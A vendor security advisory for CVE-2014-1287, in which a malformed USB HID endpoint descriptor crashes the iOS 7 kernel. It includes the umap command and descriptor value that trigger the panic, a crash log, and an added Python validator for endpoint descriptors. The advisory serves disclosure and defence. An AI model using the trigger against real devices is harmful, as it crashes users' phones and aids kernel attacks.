iOS 7 Arbitrary Code Execution
Source: nccgroup.com  Author: Davis  Published: 2014-03-17
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
 Vulnerability Summary
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

 Title             iOS 7 arbitrary code execution in kernel mode
 Release Date      14 March 2014
 Reference         NGS00596
 Discoverer        Andy Davis 
 Vendor            Apple
 Vendor Reference  600217059
 Systems Affected  iPhone 4 and later, iPod touch (5th generation) and later, 
                   iPad 2 and later
 CVE Reference     CVE-2014-1287
 Risk              High
 Status            Fixed

~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
 Resolution Timeline
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

 Discovered        26 September 2013
 Reported          26 September 2013
 Released          26 September 2013
 Fixed             10 March 2014
 Published         14 March 2014

~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
 Vulnerability Description 
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

 When a specific value is supplied in the USB Endpoint descriptor for a HID device,
 the Apple device kernel panics and reboots.

~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
 Technical Details
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

 The bug can be triggered using umap (https://github.com/nccgroup/umap)
 as follows:

 sudo python3 ./umap.py -P /dev/ttyUSB0 -s 09:00:00:E:46

 bMaxPacketSize = 0xff

 Incident Identifier: F0856C91-7616-4DAC-9907-C504401D9951
 CrashReporter Key:   7ed804add6a0507b6a8ca9625f0bcd14abc6801b
 Hardware Model:      iPhone3,1
 Date/Time:           2013-09-26 12:35:46.892 +0100
 OS Version:          iOS 7.0 (11A465)

 panic(cpu 0 caller 0x882220a5): kernel abort type 4: fault_type=0x1, 
 fault_addr=0x28
 r0:   0x00000003  r1: 0x889e70bd  r2: 0x00000012  r3: 0xfffffffe
 r4:   0x9ae83000  r5: 0x00000003  r6: 0x00000000  r7: 0x87ff3d78
 r8:   0x00000000  r9: 0x00000000 r10: 0x00000000 r11: 0x00000001
 r12:  0x87ff3d50  sp: 0x87ff3d10  lr: 0x88af52bf  pc: 0x88af51f8
 cpsr: 0x80000033 fsr: 0x00000005 far: 0x00000028

 Debugger message: panic
 OS version: 11A465
 Kernel version: Darwin Kernel Version 14.0.0: Tue Aug 13 21:39:05 PDT 2013; 
 root:xnu-2423.1.73~3/RELEASE_ARM_S5L8930X
 iBoot version: iBoot-1940.1.75
 secure boot?: YES
 Paniclog version: 1
 Kernel slide:     0x0000000008200000
 Kernel text base: 0x88201000
 Epoch Time:        sec       usec
   Boot    : 0x52441b69 0x00000000
   Sleep   : 0x00000000 0x00000000
   Wake    : 0x00000000 0x00000000
   Calendar: 0x52441bb5 0x00056497

 Panicked task 0x896f8d48: 12856 pages, 114 threads: pid 0: kernel_task
 panicked thread: 0x8023de90, backtrace: 0x87ff3a48
                  lr: 0x88317889  fp: 0x87ff3a7c
                  lr: 0x883181f7  fp: 0x87ff3ab0
                  lr: 0x882b783b  fp: 0x87ff3ad4
                  lr: 0x882220a5  fp: 0x87ff3ba0
                  lr: 0x8821c7c4  fp: 0x87ff3d78
                  lr: 0x88af8687  fp: 0x87ff3da8
                  lr: 0x8828b5bd  fp: 0x87ff3dd0
                  lr: 0x889d6d29  fp: 0x87ff3df0
                  lr: 0x889da2f3  fp: 0x87ff3e18
                  lr: 0x8828b5bd  fp: 0x87ff3e40
                  lr: 0x889da14f  fp: 0x87ff3e7c
                  lr: 0x88acb8e7  fp: 0x87ff3eb8
                  lr: 0x88ac9815  fp: 0x87ff3ed4
                  lr: 0x884b24d3  fp: 0x87ff3f60
                  lr: 0x882cf869  fp: 0x87ff3fa8
                  lr: 0x8821f05c  fp: 0x00000000

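 The trigger above is a single descriptor field outside the range the USB
 specification allows. The following Python is an added example written for this
 page; it is not part of the NCC Group advisory, of umap, or of Apple's fix, and
 it makes no claim about the kernel code path that faulted. It shows the check a
 USB host stack should apply before trusting a device-supplied endpoint
 descriptor: parse the 7-byte structure, then validate wMaxPacketSize (the
 16-bit field the advisory refers to as bMaxPacketSize) against the limits for
 the negotiated bus speed and transfer type. The sample descriptors are
 constructed for the example, with the advisory's value 0xff placed in the low
 byte of wMaxPacketSize; the limits are those of the USB 2.0 specification.

```python
import struct
from dataclasses import dataclass
from typing import List

# USB 2.0 section 9.6.6: an endpoint descriptor is 7 bytes with bDescriptorType 0x05.
ENDPOINT_DESCRIPTOR_LENGTH = 7
ENDPOINT_DESCRIPTOR_TYPE = 0x05

# bmAttributes bits 1..0 select the transfer type.
TRANSFER_TYPES = {0: "control", 1: "isochronous", 2: "bulk", 3: "interrupt"}

# Largest value bits 10..0 of wMaxPacketSize may carry, per bus speed and transfer type.
# A transfer type missing from a speed's table is not permitted at that speed.
MAX_PACKET_SIZE = {
    "low":  {"control": 8,  "interrupt": 8},
    "full": {"control": 64, "bulk": 64,  "interrupt": 64,   "isochronous": 1023},
    "high": {"control": 64, "bulk": 512, "interrupt": 1024, "isochronous": 1024},
}
# Bulk endpoints may only use these exact sizes.
BULK_SIZES = {"full": {8, 16, 32, 64}, "high": {512}}


@dataclass
class EndpointDescriptor:
    address: int                  # bEndpointAddress (bit 7 set = IN)
    attributes: int               # bmAttributes
    max_packet_size: int          # wMaxPacketSize bits 10..0
    additional_transactions: int  # wMaxPacketSize bits 12..11 (high-speed periodic only)
    interval: int                 # bInterval

    @property
    def transfer_type(self) -> str:
        return TRANSFER_TYPES[self.attributes & 0x03]


def parse_endpoint_descriptor(raw: bytes) -> EndpointDescriptor:
    """Decode the 7-byte endpoint descriptor, rejecting malformed framing up front."""
    if len(raw) < ENDPOINT_DESCRIPTOR_LENGTH:
        raise ValueError(f"short endpoint descriptor: {len(raw)} bytes")
    length, dtype, address, attributes, wmps, interval = struct.unpack_from("<BBBBHB", raw)
    if dtype != ENDPOINT_DESCRIPTOR_TYPE:
        raise ValueError(f"bDescriptorType 0x{dtype:02x} is not an endpoint descriptor")
    if length < ENDPOINT_DESCRIPTOR_LENGTH:
        raise ValueError(f"bLength {length} is below the 7-byte minimum")
    return EndpointDescriptor(
        address=address,
        attributes=attributes,
        max_packet_size=wmps & 0x07FF,
        additional_transactions=(wmps >> 11) & 0x03,
        interval=interval,
    )


def validate_endpoint(ep: EndpointDescriptor, speed: str) -> List[str]:
    """Return the spec violations in ep for a device enumerated at the given bus speed.

    An empty list means the host may use wMaxPacketSize for buffer sizing.
    """
    problems = []
    kind = ep.transfer_type
    limit = MAX_PACKET_SIZE[speed].get(kind)
    if limit is None:
        problems.append(f"{kind} endpoints are not permitted at {speed} speed")
    elif ep.max_packet_size > limit:
        problems.append(
            f"wMaxPacketSize {ep.max_packet_size} exceeds the {speed}-speed {kind} limit of {limit}")
    if kind == "bulk" and limit is not None and ep.max_packet_size not in BULK_SIZES[speed]:
        problems.append(f"bulk wMaxPacketSize {ep.max_packet_size} is not a permitted size")
    if kind != "isochronous" and ep.max_packet_size == 0:
        problems.append("zero wMaxPacketSize on a non-isochronous endpoint")
    if ep.additional_transactions:
        if speed != "high" or kind not in ("interrupt", "isochronous"):
            problems.append("additional-transaction bits set on an endpoint that cannot use them")
        elif ep.additional_transactions == 3:
            problems.append("reserved value 3 in wMaxPacketSize bits 12..11")
    return problems


# Constructed sample descriptors (not taken from the advisory's capture): an interrupt
# IN endpoint 1 with bInterval 10, first with the out-of-range packet size 0xff that
# the advisory reports, then with a conventional 8-byte HID report size.
OVERSIZED_HID_ENDPOINT = bytes([0x07, 0x05, 0x81, 0x03, 0xFF, 0x00, 0x0A])
SANE_HID_ENDPOINT      = bytes([0x07, 0x05, 0x81, 0x03, 0x08, 0x00, 0x0A])


def check(raw: bytes, speed: str = "full") -> List[str]:
    """Parse then validate; a host should refuse the endpoint if anything comes back."""
    return validate_endpoint(parse_endpoint_descriptor(raw), speed)


if __name__ == "__main__":
    for name, raw in (("oversized", OVERSIZED_HID_ENDPOINT), ("sane", SANE_HID_ENDPOINT)):
        print(name, check(raw) or "ok")
```

 The limit depends on the bus speed the device enumerated at: 255 bytes is out of
 range for a full-speed interrupt endpoint but legal for a high-speed one, so a
 validator that hard-codes 64 rejects legitimate devices and one that hard-codes
 1024 accepts the descriptor above. Any stack that allocates or indexes a transfer
 buffer from this field should run a check of this kind first.
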
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
 Fix Information
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

 A patch can be downloaded from the following location:
 http://support.apple.com/kb/HT1222
  
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
 NCC Group
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

 Research     https://www.nccgroup.com/research
 Twitter      https://www.twitter.com/NCCGroupInfoSec / @NCCGroupInfoSec
 Open Source  https://github.com/nccgroup
 Blog         https://www.nccgroup.com/en/blog/cyber-security/
 SlideShare   http://www.slideshare.net/NCC_Group/



 